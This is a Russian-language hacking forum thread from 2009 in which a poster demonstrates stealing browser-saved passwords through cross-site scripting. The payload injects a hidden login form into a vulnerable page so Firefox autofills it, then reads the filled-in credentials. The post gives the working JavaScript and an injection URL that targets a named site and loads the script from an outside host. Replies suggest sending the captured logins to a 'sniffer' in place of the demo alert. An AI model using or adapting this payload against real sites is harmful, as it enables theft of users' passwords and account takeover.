Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
Раскручиваем Xss( вытаскиваем пароли ) |
12.04.2009, 01:13
|
|
Новичок
Регистрация: 25.08.2007
Сообщений: 14
Провел на форуме:
78180
Репутация:
25
|
|
Раскручиваем Xss( вытаскиваем пароли )
Раскручиваем Xss( вытаскиваем пароли )
Возможно для кого-то это не новость, но в паблике об этом я не читал, поэтому покажу что накопал.
Мы легко уводим из браузеров кукисы и различную информацию. Но хочется большего - паролей. И их можно получить. С помощью xss.
В браузерах есть такая фича, как запоминание паролей.
В разных браузерах механизм этого дела устроен по разному. Будем разбирать его на примере Firefox.
Как только загружается страница, проверяются сохраненные пароли для этого сайта. Если на странице есть подходящие формы, то они автоматически заполняются. А теперь - что нам мешает вытащить их с помощью xss? - ничего, что мы и делаем. Но ведь это довольно редкий случай, что на странице с xss есть форма логина. Идем дальше.
Создаем такую форму сами. И, о чудо - форма, которую мы создали с помощью xss, после загрузки заполнилась личными данными. Логином и паролем.
Разберем все на примере.
Возьмем подопытного из темы с пассивками.
Код:
http://web20.a.ua/slovo?query=[XSS]&stype=word
Смотрим форму.
Также заодно посмотрим куда можно вставить нашу форму.
получаем следующий код:
Код:
document.getElementById('radio').innerHTML = '<form action="?" method="POST"><input id="login" type="text" name="login" style="width: 0px; height: 0px; border: 0px"><input type="password" id="password" name="password" style="width: 0px; height: 0px; border: 0px"><input type='submit'></form>
interval = setInterval('check()', 100);
window.stop();
function check() {
l = document.getElementById('login').value;
p = document.getElementById('password').value;
if (l!='') {
alert(l+"/"+p);
}
}
Все это дело пишем в файл
Код:
http://web20.a.ua/slovo?query=<script src="host.ru/file.js"></script>&stype=word
и вуаля, получаем логин и пароль.
На Лисе данный баг работает на ура.
На ИЕ(6.0) и Опере - возможен только если пользователь сам заполнит поля. 
В Chrome у меня вообще опция сохранения паролей не работает. а жаль...
|
|
|
12.04.2009, 13:32
|
|
Познающий
Регистрация: 19.11.2007
Сообщений: 81
Провел на форуме:
509730
Репутация:
52
|
|
интересно,ща проверим
|
|
|
|
12.04.2009, 13:38
|
|
Banned
Регистрация: 27.03.2009
Сообщений: 45
Провел на форуме:
535960
Репутация:
142
|
|
т.е. логин/пасс вылетают в алерте?
а какой смысл, если алерт увидит только жертва?
|
|
|
|
12.04.2009, 13:40
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
Сообщение от иддкд
т.е. логин/пасс вылетают в алерте?
а какой смысл, если алерт увидит только жертва?
ну как бы алерт говорит о наличии XSS только, а вставить можно и перенаправление на снифер, например, а не алерт
|
|
|
|
27.04.2009, 02:22
|
|
Новичок
Регистрация: 24.04.2009
Сообщений: 11
Провел на форуме:
135977
Репутация:
1
|
|
Pashkela прав, проще на снеф перенаправлять
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
